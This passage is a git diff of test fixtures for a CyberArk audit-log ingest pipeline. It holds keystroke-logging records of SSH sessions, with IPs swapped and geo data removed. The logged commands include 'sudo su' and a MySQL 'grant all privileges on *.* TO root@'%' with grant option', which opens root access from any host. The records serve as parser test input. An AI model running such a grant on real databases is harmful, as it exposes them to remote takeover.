su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=7T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:33:47","IsoTimestamp":"2021-03-15T10:33:47Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=7T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T10:35:08Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:35:08\n 2021-03-15T10:35:08Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=7T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:35:08","IsoTimestamp":"2021-03-15T10:35:08Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=7T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T14:11:18Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:11:18\n 2021-03-15T14:11:18Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=8T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:11:18","IsoTimestamp":"2021-03-15T14:11:18Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=8T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814025"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} -<5>1 2021-03-15T14:45:51Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:45:51\n 2021-03-15T14:45:51Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n Command=(reverse-i-search)`grant': grant all privileges on *.* TO 'root'@'%' with grant option\\;;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;SSHOffset=296291B;User=testark;VIDOffset=2081T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:45:51","IsoTimestamp":"2021-03-15T14:45:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=(reverse-i-search)`grant': grant all privileges on *.* TO 'root'@'%' with grant option\\;;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;SSHOffset=296291B;User=testark;VIDOffset=2081T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"1"},{"Name":"LastFailDate","Value":"1615819476"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} +<5>1 2021-03-14T13:49:49Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:49\n 2021-03-14T13:49:49Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=10T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:49","IsoTimestamp":"2021-03-14T13:49:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=10T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T10:32:04Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:32:04\n 2021-03-15T10:32:04Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.13;SSHOffset=1312B;User=testark;VIDOffset=6T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:32:04","IsoTimestamp":"2021-03-15T10:32:04Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.13;SSHOffset=1312B;User=testark;VIDOffset=6T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T10:33:47Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:33:47\n 2021-03-15T10:33:47Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=7T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:33:47","IsoTimestamp":"2021-03-15T10:33:47Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=7T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T10:35:08Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:35:08\n 2021-03-15T10:35:08Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=7T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:35:08","IsoTimestamp":"2021-03-15T10:35:08Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=7T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T14:11:18Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:11:18\n 2021-03-15T14:11:18Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=8T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:11:18","IsoTimestamp":"2021-03-15T14:11:18Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=8T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814025"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} +<5>1 2021-03-15T14:45:51Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:45:51\n 2021-03-15T14:45:51Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n Command=(reverse-i-search)`grant': grant all privileges on *.* TO 'root'@'%' with grant option\\;;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;SSHOffset=296291B;User=testark;VIDOffset=2081T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:45:51","IsoTimestamp":"2021-03-15T14:45:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=(reverse-i-search)`grant': grant all privileges on *.* TO 'root'@'%' with grant option\\;;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;SSHOffset=296291B;User=testark;VIDOffset=2081T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"1"},{"Name":"LastFailDate","Value":"1615819476"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-361-keystroke-logging.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-361-keystroke-logging.log-expected.json index 741d58b5686..28145839ab6 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-361-keystroke-logging.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-361-keystroke-logging.log-expected.json @@ -85,7 +85,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:34.191920Z", + "ingested": "2021-12-09T13:37:00.165092Z", "original": "{\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eno\u003c/Rfc5424\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.6.0000\u003c/Version\u003e\\n \u003cMessageID\u003e361\u003c/MessageID\u003e\\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eLinux\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2\u003c/File\u003e\\n \u003cStation\u003e10.2.0.7\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=ls \\\"/var/tmp\\\";ConnectionComponentId=PSMP-SSH;DstHost=radiussrv.cyberark.local;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=499852f2-22b5-11eb-8bff-000c297aae88;SrcHost=10.2.0.6;SSHOffset=3642B;User=admin2;VIDOffset=125T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"LINUX-SSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"admin2\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"radiussrv.cyberark.local\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMDisabled\\\" Value=\\\"No Reason\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Customer\\\" Value=\\\"Tesla\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.6.0000\",\"MessageID\":\"361\",\"IsoTimestamp\":\"2021-03-16T15:01:00Z\",\"Desc\":\"Keystroke logging\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Keystroke logging\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Linux\",\"File\":\"Root\\\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2\",\"Station\":\"10.2.0.7\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=ls \\\"/var/tmp\\\";ConnectionComponentId=PSMP-SSH;DstHost=radiussrv.cyberark.local;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=499852f2-22b5-11eb-8bff-000c297aae88;SrcHost=10.2.0.6;SSHOffset=3642B;User=admin2;VIDOffset=125T;\",\"Message\":\"Keystroke logging\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"LINUX-SSH\"},{\"Name\":\"UserName\",\"Value\":\"admin2\"},{\"Name\":\"Address\",\"Value\":\"radiussrv.cyberark.local\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"CPMDisabled\",\"Value\":\"No Reason\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"Customer\",\"Value\":\"Tesla\"}]}}}}", "code": "361", "kind": "event", @@ -108,39 +108,18 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "testark" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "Administrator" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -157,7 +136,7 @@ }, "@timestamp": "2021-03-14T13:49:49.000Z", "file": { - "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark" + "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark" }, "ecs": { "version": "1.12.0" @@ -168,16 +147,15 @@ "testark" ], "ip": [ - "81.32.170.205", - "34.123.103.115", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-14T13:49:49Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 06:49:49\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T13:49:49Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e361\u003c/MessageID\u003e\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eCommand=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=10T;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n 